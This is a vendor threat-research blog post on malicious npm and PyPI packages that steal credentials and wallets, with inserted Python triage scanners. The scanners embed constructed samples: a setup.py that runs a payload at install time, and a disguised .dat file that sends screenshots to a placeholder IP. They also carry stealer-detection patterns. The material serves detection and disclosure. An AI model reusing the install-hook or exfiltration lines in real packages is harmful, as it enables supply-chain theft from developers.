Malicious Packages Across Open-Source Registries: Detection Statistics and Trends (Q2 2025)
Summary: the article notes that the abuse of open-source software repositories as a malware distribution channel is a continuing trend. Q2 2025 data shows that attackers still frequently use NPM and PyPI packages for data theft and similar activity, hiding malicious behavior by minimizing their code footprint, using install scripts, and applying obfuscation. FortiGuard Labs observed a large number of malicious packages and offers protection recommendations against supply-chain threats. 2025-08-04 13:00:00 Author: feeds.fortinet.com

In a previous blog, FortiGuard Labs highlighted a growing trend in the use of open source software (OSS) repositories as channels for malware distribution in software supply chains. With the continued reliance on third-party packages in development workflows, threat actors are increasingly exploiting the trust placed in the open-source ecosystem to propagate malicious code, exfiltrate data, and cause other harm.

By leveraging our proprietary AI-powered malware detection and continuous monitoring system, FortiGuard Labs has established real-time tracking and detection of newly published packages. This ongoing, global monitoring enables us to rapidly identify emerging threats and evolving attack techniques.

Analysis of data collected during the second quarter (Q2 2025) reveals that the use of OSS repositories as malware distribution channels in supply chains is not only persistent but remains essentially unchanged in its core tactics. In this report, we present updated statistics on malicious package activity observed in the wild during the second quarter. We also present a couple of selected examples of malicious packages uncovered during the quarter, offering insights into trends and techniques observed in OSS ecosystems.

During the quarter, our automated threat detection platform scanned over 1.4 million NPM (Node Package Manager) and 400,000 PyPI (Python Package Index) packages, uncovering a substantial number of malicious packages. Data exfiltration, typically launched from a setup or install script so that it runs at installation time, was among the most common malicious behaviors in these packages, reaffirming the threat patterns and trends observed in our previous blog.

As shown in the statistics above, based on over a thousand analyst-confirmed malicious packages, the high percentage of low file counts, missing repositories, and the use of install scripts suggests that malware authors aim to minimize their code footprint, reduce traceability, and silently deploy malicious payloads during the installation process. We also observed an increase in the use of obfuscation compared to the previous quarter.
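The three metadata signals named above can be checked before a package is ever installed. The following Python script is an added example, not FortiGuard's detection platform: it applies the same heuristics to a constructed npm package.json and a constructed setup.py, flagging a low file count, a missing repository link, and install-time execution (npm lifecycle hooks; a setuptools cmdclass override; exec, eval or subprocess calls anywhere in setup.py, which run when the installer executes the file). The file-count cut-off of five and the sample packages are assumptions; the report gives no exact threshold.

```python
"""Pre-install triage for the signals in the Q2 statistics: low file count,
missing repository link, and code that runs during installation.
Added example; not FortiGuard's detection platform."""
import ast
import json
from dataclasses import dataclass, field
from typing import List

LOW_FILE_COUNT = 5  # assumed cut-off; the report gives no exact number
# npm lifecycle hooks that run shell commands during `npm install`
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# setuptools commands that packages override via cmdclass to run code at install time
SETUPTOOLS_INSTALL_CMDS = {"install", "develop", "egg_info", "build_py"}
# calls in setup.py that execute code or commands while the installer runs the file
INSTALL_TIME_CALLS = {"exec", "eval", "os.system", "subprocess.Popen",
                      "subprocess.run", "subprocess.call", "subprocess.check_output"}


@dataclass
class Finding:
    signals: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.signals)


def triage_npm(package_json: str, file_count: int) -> Finding:
    """Score an npm package from its package.json and the number of files in the tarball."""
    f = Finding()
    meta = json.loads(package_json)
    if file_count <= LOW_FILE_COUNT:
        f.signals.append(f"low file count ({file_count})")
    if not meta.get("repository"):
        f.signals.append("no repository field")
    scripts = meta.get("scripts", {})
    for hook in NPM_INSTALL_HOOKS:
        if hook in scripts:
            f.signals.append(f"install hook {hook}: {scripts[hook]}")
    return f


def _call_name(call: ast.Call) -> str:
    """Dotted name of a call target, e.g. 'subprocess.Popen'; '' if not a plain name."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(node.id)
    return ".".join(reversed(parts))


def triage_pypi(setup_py: str, file_count: int) -> Finding:
    """Score a PyPI sdist from its setup.py source and file count, without importing it."""
    f = Finding()
    if file_count <= LOW_FILE_COUNT:
        f.signals.append(f"low file count ({file_count})")
    tree = ast.parse(setup_py)
    setup_kwargs = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node).split(".")[-1] == "setup":
            setup_kwargs = {kw.arg: kw.value for kw in node.keywords if kw.arg}
    if not ({"url", "project_urls"} & setup_kwargs.keys()):
        f.signals.append("no url/project_urls in setup()")
    cmdclass = setup_kwargs.get("cmdclass")
    if isinstance(cmdclass, ast.Dict):
        for key in cmdclass.keys:
            if isinstance(key, ast.Constant) and key.value in SETUPTOOLS_INSTALL_CMDS:
                f.signals.append(f"cmdclass overrides {key.value}")
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) in INSTALL_TIME_CALLS:
            f.signals.append(f"install-time call to {_call_name(node)} (line {node.lineno})")
    return f


# Constructed samples modelled on the report's description, not the real packages.
SAMPLE_PACKAGE_JSON = """{
  "name": "demo-theme-vars", "version": "7.0.7", "main": "index.js",
  "scripts": {"postinstall": "node test-samples.dat"}
}"""
BENIGN_PACKAGE_JSON = """{
  "name": "demo-lib", "version": "1.0.0",
  "repository": {"type": "git", "url": "https://example.com/demo/demo-lib.git"},
  "scripts": {"test": "node test.js"}
}"""
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import subprocess

class RunPayload(install):
    def run(self):
        install.run(self)
        subprocess.Popen(["python", "mali.py"])   # payload launched during pip install

setup(name="demo-pkg", version="0.1.0", cmdclass={"install": RunPayload})
'''

if __name__ == "__main__":
    for label, finding in [("npm sample", triage_npm(SAMPLE_PACKAGE_JSON, 3)),
                           ("npm benign", triage_npm(BENIGN_PACKAGE_JSON, 40)),
                           ("pypi sample", triage_pypi(SAMPLE_SETUP_PY, 2))]:
        print(f"{label}: score {finding.score}", *finding.signals, sep="\n  ")
```

Run it against a real sdist or tarball by passing the text of its setup.py or package.json and the number of entries in the archive. The score is a triage signal only: legitimate packages with compiled extensions also override build commands, so a hit should route the package to manual review rather than to an automatic block.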

To provide a closer look, here are a couple of examples from our Q2 findings:

Malicious Python Packages Steal Credentials and Wallets

Several malicious PyPI packages discovered in Q2, namely simple-mali-pkg-0.1.0, confighum-0.3.5, sinontop-utils-0.3.5, solana-sdkpy-1.2.5, and solana-sdkpy-1.2.6, are strong examples of the tactics reflected in our statistical findings. They combine several techniques commonly used by threat actors: executing code from the install script, overriding setup commands so that the payload runs as part of installation, a low file count, no linked repository, and encryption or obfuscation of the code to conceal its true nature.

Figure 1: setup.py of simple-mali-pkg-0.1.0

The setup.py file of simple-mali-pkg-0.1.0 executes a suspicious file bundled in the package, mali.py. Looking into mali.py, we see a large amount of encrypted code, wrapped in dozens of layers of encryption to hide its true intentions.

Figure 2: mali.py of simple-mali-pkg-0.1.0

After full decryption, its behavior is revealed. Here is a snippet of the code hinting at the theft of credentials and wallets.

Figure 3: Decrypted mali.py indicating the stealing of personal data and wallets

NPM Malware Package Follows Suit – Obfuscated Code Used to Steal Data

This NPM package example demonstrates the same core behavior of data theft and exfiltration. The package postcss-theme-vars-7.0.7, while differing in implementation, shares its core behavior with simple-mali-pkg-0.1.0. Here the malicious code resides in a file named test-samples.dat, a likely attempt at misdirection: the extension conceals the fact that the content is JavaScript. This file also contains a large amount of obfuscated code. At the beginning of last quarter, Socket reported a similarly named package that impersonated the legitimate PostCSS library. Since that disclosure the threat has persisted and is now resurfacing with variations in its code, which highlights the ongoing persistence of data theft campaigns within open source ecosystems.

Figure 4: test-samples.dat of postcss-theme-vars-7.0.7

Upon deobfuscation, the code reveals functions designed to steal sensitive information from multiple browser profiles, as well as wallets, credentials, and documents. It also captures screenshots, logs keystrokes, monitors the clipboard, and transmits the collected data to a remote server controlled by the attacker. Some deobfuscated snippets of test-samples.dat are shown below.

Figure 5: This code snippet makes a socket connection to the attacker-controlled remote server

Figure 6: This code snippet targets Chrome and Brave browser profiles and collects saved passwords, autofill data, and extension settings

Figure 7: This code snippet silently scans the victim's computer for sensitive files for exfiltration

Figure 8: This code snippet logs keyboard input, monitors clipboards, and takes screenshots
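Two things in this sample are cheap to check mechanically across a whole package: JavaScript parked in a file whose extension says otherwise, and the capability indicators behind Figures 5 to 8. The following Python scanner is an added example, not Fortinet's SCA tooling: it sniffs each file for JavaScript regardless of extension, flags common obfuscation idioms, resolves \xNN escapes so strings hidden that way still match, and reports which capability groups (C2 socket, browser profile data, wallets, document sweep, keylog/clipboard/screenshot) the file references. The indicator regexes, module names and the sample package are assumptions; they are not strings taken from test-samples.dat.

```python
"""Triage an unpacked npm package for JavaScript hidden behind a non-JS
extension (as with test-samples.dat) and for the stealer capabilities listed in
Figures 5-8. Added example; not Fortinet tooling. The indicator regexes and
module names are assumptions, not strings taken from the sample."""
import re
from pathlib import Path
from typing import Dict, List

JS_EXTENSIONS = {".js", ".cjs", ".mjs", ".ts", ".json"}
# Evidence the content is JavaScript regardless of what the extension claims
JS_MARKERS = re.compile(r"\brequire\(|\bmodule\.exports\b|\bfunction\s*\(|=>|\beval\(|new Function\(")
OBFUSCATION_MARKERS = [
    ("hex-escaped strings", re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")),
    ("_0x identifiers", re.compile(r"\b_0x[0-9a-fA-F]{4,}\b")),
    ("runtime string decoding", re.compile(r"String\.fromCharCode|\batob\(|Buffer\.from\([^)]*['\"]base64['\"]")),
]
# Capability indicators (assumed); checked after \xNN escapes are resolved
CAPABILITIES = {
    "c2-socket": re.compile(r"\bnet\.(connect|createConnection|Socket)\b|new WebSocket\(|\bhttps?\.request\("),
    "browser-data": re.compile(r"User Data|Login Data|Web Data|BraveSoftware|Google[\\/]+Chrome"),
    "wallets": re.compile(r"\bExodus\b|\bElectrum\b|wallet\.dat|Ledger Live"),
    "file-sweep": re.compile(r"readdirSync|\.(docx?|pdf|xlsx?|kdbx)\b"),
    "keylog-clipboard-screenshot": re.compile(r"iohook|clipboardy|clipboard\.readSync|screenshot-desktop|desktopCapturer"),
}
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def _resolve_hex_escapes(text: str) -> str:
    """Turn a literal \\x4c\\x6f... sequence into the characters it encodes so
    indicators hidden that way still match."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_file(relpath: str, text: str) -> dict:
    ext = Path(relpath).suffix.lower()
    js_by_ext = ext in JS_EXTENSIONS
    looks_js = bool(JS_MARKERS.search(text))
    findings: List[str] = []
    capabilities: List[str] = []
    if looks_js and not js_by_ext:
        findings.append(f"JavaScript content behind {ext or 'no'} extension")
    if js_by_ext or looks_js:
        for label, rx in OBFUSCATION_MARKERS:
            if rx.search(text):
                findings.append(f"obfuscation: {label}")
        longest = max((len(line) for line in text.splitlines()), default=0)
        if longest > 1000:  # assumed cut-off for packed single-line payloads
            findings.append(f"obfuscation: {longest}-char line")
        decoded = _resolve_hex_escapes(text)
        capabilities = sorted(name for name, rx in CAPABILITIES.items() if rx.search(decoded))
    return {"path": relpath, "findings": findings, "capabilities": capabilities}


def scan_package(files: Dict[str, str]) -> List[dict]:
    """files maps relative path -> text; returns only files with something to report."""
    results = []
    for relpath in sorted(files):
        r = scan_file(relpath, files[relpath])
        if r["findings"] or r["capabilities"]:
            results.append(r)
    return results


def scan_dir(root: str) -> List[dict]:
    """Same check over an unpacked tarball on disk (e.g. after `npm pack` and tar xf)."""
    base = Path(root)
    files = {str(p.relative_to(base)): p.read_text(errors="replace")
             for p in base.rglob("*") if p.is_file()}
    return scan_package(files)


# Constructed sample package: a clean entry point plus a payload parked in a .dat file.
SAMPLE_PACKAGE = {
    "package.json": '{"name": "demo-theme-vars", "version": "7.0.7", "main": "index.js"}',
    "index.js": "const postcss = require('postcss');\nmodule.exports = (opts) => postcss.plugin('demo', opts);\n",
    "test-samples.dat": (
        "var _0x4a1b=['\\x4c\\x6f\\x67\\x69\\x6e\\x20\\x44\\x61\\x74\\x61','BraveSoftware','wallet.dat'];"
        "const net=require('net');const s=net.connect(4444,'203.0.113.10');"
        "require('screenshot-desktop')().then(b=>s.write(b));"
    ),
}

if __name__ == "__main__":
    for r in scan_package(SAMPLE_PACKAGE):
        print(r["path"], r["findings"], r["capabilities"])
```

Point scan_dir at the output of `npm pack` on a candidate version before it reaches a lockfile. A file that is JavaScript behind a foreign extension and references two or more capability groups is a strong reason to pull the tarball apart by hand; a lone `readdirSync` hit in a build script is not.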

Conclusion

The findings from our Q2 2025 data analysis reinforce the observations we made in the previous quarter. The abuse of OSS repos to propagate malware remains persistent. While overall tactics have not evolved significantly, attackers continue to rely on proven techniques, such as minimizing file count, using installation scripts, and employing discreet data exfiltration methods that maximize impact.

A continued rise in obfuscation further underscores the need for vigilance and ongoing monitoring by users of these services. And as OSS continues to grow, so too will the attack surface for supply chain threats.

It is highly recommended that organizations and individuals strengthen their defenses with knowledge and awareness of OSS supply chain threats. This is an essential first step toward effectively mitigating or preventing potential risks.

Fortinet Protections

FortiGuard AntiVirus detects the malicious files identified in this report as

simple-mali-pkg-0.1.0: Python/FreeCodingTools.10037449!tr
confighum-0.3.5: Python/FreeCodingTools.10037449!tr
sinontop-utils-0.3.5: Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.5: Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.6: Python/FreeCodingTools.10037449!tr
postcss-theme-vars-7.0.7: JS/Stealer.A!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.

The FortiDevSec SCA scanner detects malicious packages, including those cited in this report, when they appear as dependencies in users' projects during testing, and prevents those dependencies from being introduced into users' products.

If you believe these or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs

Package name              Sha256                                                            Detection
simple-mali-pkg-0.1.0     a9114a446a136ddf38c16f9e1bb1a83400cba423d0d97df121a54b67829be7b9  Python/FreeCodingTools.10037449!tr
confighum-0.3.5           2e037be549c01fec14d9cad59075708476e90456deb53811f4301eb111c1104b  Python/FreeCodingTools.10037449!tr
sinontop-utils-0.3.5      00892955b1a2302536f4d7175cd30d89f961c1f45d56461e62ba0549b5906ae9  Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.5        d63099defcc1ee6dcbcbb68383e435347b661a9e399f5a028f735b5f6f3f86d7  Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.6        de23b7350619938388cc01f8086df95858495c6c8d73743a3c20d0ced3aece5b  Python/FreeCodingTools.10037449!tr
postcss-theme-vars-7.0.7  2d9d200b8e167fc95120e893dd3d7d02789a8ba41ba2632af2e342f35d1d2283  JS/Stealer.A!tr


Source: https://feeds.fortinet.com/~/922680806/0/fortinet/blog/threat-research~Malicious-Packages-Across-OpenSource-Registries-Detection-Statistics-and-Trends-Q